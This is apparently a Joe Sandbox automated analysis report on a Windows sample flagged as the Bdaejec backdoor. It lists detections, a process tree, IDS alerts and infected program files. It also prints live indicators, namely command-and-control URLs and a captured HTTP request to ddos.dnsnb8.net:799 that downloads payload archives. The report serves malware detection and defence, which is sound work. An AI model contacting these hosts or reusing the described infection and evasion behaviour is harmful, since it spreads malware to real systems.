Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yRc7UfFif9.exe

Overview

General Information

Sample name:yRc7UfFif9.exe
renamed because original name is a hash value
Original sample name:2024-12-28_7acf6527ef4bef7f7325a94c4d92c1f9.exe
Analysis ID:1581653
MD5:7acf6527ef4bef7f7325a94c4d92c1f9
SHA1:8c39212f127dfe4c04b05f05b9e6759566ed207a
SHA256:69e834be4264dab45e393e63952ae3b65f4e027a5928509c013b16175a43504b
Tags:backdoorexeuser-zhuzhu0009
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • yRc7UfFif9.exe (PID: 6580 cmdline: "C:\Users\user\Desktop\yRc7UfFif9.exe" MD5: 7ACF6527EF4BEF7F7325A94C4D92C1F9)
    • sgKbPm.exe (PID: 7164 cmdline: C:\Users\user\AppData\Local\Temp\sgKbPm.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 6848 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: sgKbPm.exe PID: 7164JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:24:59.104038+010028079081Malware Command and Control Activity Detected192.168.2.54970444.221.84.105799TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-12-28T12:24:57.491932+010028385221Malware Command and Control Activity Detected192.168.2.5551851.1.1.153UDP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: yRc7UfFif9.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k2.rar_Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar9Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarpAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarBAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarBAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/Avira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarHAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarIAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarnAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeReversingLabs: Detection: 97%
    Source: yRc7UfFif9.exeReversingLabs: Detection: 97%
    Source: yRc7UfFif9.exeVirustotal: Detection: 87%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: yRc7UfFif9.exeJoe Sandbox ML: detected
    Source: yRc7UfFif9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C529E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00C529E2
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C52B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00C52B8C
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2838522 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup : 192.168.2.5:55185 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2807908 - Severity 1 - ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin : 192.168.2.5:49704 -> 44.221.84.105:799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: global trafficTCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C51099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,1_2_00C51099
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: sgKbPm.exe, 00000001.00000003.2022814417.0000000000C40000.00000004.00001000.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433355566.0000000000C53000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar9
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarB
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000F7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarB
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarH
    Source: sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarI
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar_
    Source: sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433918808.00000000029EA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: sgKbPm.exe, 00000001.00000003.2045756473.0000000000FA5000.00000004.00000020.00020000.00000000.sdmp, sgKbPm.exe, 00000001.00000002.2433578277.0000000000FA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_e80d517b-f

    System Summary

    barindex
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: sgKbPm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00417B710_2_00417B71
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_004073200_2_00407320
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C560761_2_00C56076
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C56D001_2_00C56D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sgKbPm.exe 4354970CCC7CD6BB16318F132C34F6A1B3D5C2EA7FF53E1C9271905527F2DB07
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: String function: 0040379C appears 32 times
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: yRc7UfFif9.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: sgKbPm.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: sgKbPm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: sgKbPm.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
    Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/11@1/1
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C5119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,1_2_00C5119F
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rarJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7164
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeFile created: C:\Users\user\AppData\Local\Temp\sgKbPm.exeJump to behavior
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCommand line argument: Z@0_2_00405A30
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: yRc7UfFif9.exeReversingLabs: Detection: 97%
    Source: yRc7UfFif9.exeVirustotal: Detection: 87%
    Source: unknownProcess created: C:\Users\user\Desktop\yRc7UfFif9.exe "C:\Users\user\Desktop\yRc7UfFif9.exe"
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeProcess created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe C:\Users\user\AppData\Local\Temp\sgKbPm.exe
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 1468
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeProcess created: C:\Users\user\AppData\Local\Temp\sgKbPm.exe C:\Users\user\AppData\Local\Temp\sgKbPm.exeJump to behavior
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: ntvdm64.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Data Obfuscation

    barindex
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeUnpacked PE file: 1.2.sgKbPm.exe.c50000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00409607 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00409607
    Source: initial sampleStatic PE information: section where entry point is pointing to: wu
    Source: yRc7UfFif9.exeStatic PE information: section name: wu
    Source: sgKbPm.exe.0.drStatic PE information: section name: .aspack
    Source: sgKbPm.exe.0.drStatic PE information: section name: .adata
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ
    Source: MyProg.exe.1.drStatic PE information: section name: PELIB
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: SciTE.exe.1.drStatic PE information: section name: u
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00416E7B push ebp; ret 0_2_00416E7E
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_00416E85 push 00000000h; ret 0_2_00417296
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeCode function: 0_2_004037E1 push ecx; ret 0_2_004037F4
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C56076 push 00C514E1h; ret 1_2_00C56425
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C51638 push dword ptr [00C53084h]; ret 1_2_00C5170E
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C5600A push ebp; ret 1_2_00C5600D
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeCode function: 1_2_00C52D9B push ecx; ret 1_2_00C52DAB
    Source: yRc7UfFif9.exeStatic PE information: section name: wu entropy: 6.934516547069036
    Source: sgKbPm.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
    Source: Uninstall.exe.1.drStatic PE information: section name: EpNuZ entropy: 6.934478529640631
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR entropy: 6.934470497867294
    Source: SciTE.exe.1.drStatic PE information: section name: u entropy: 6.934409931315566

    Persistence and Installation Behavior

    barindex
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\Desktop\yRc7UfFif9.exeFile created: C:\Users\user\AppData\Local\Temp\sgKbPm.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\sgKbPm.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
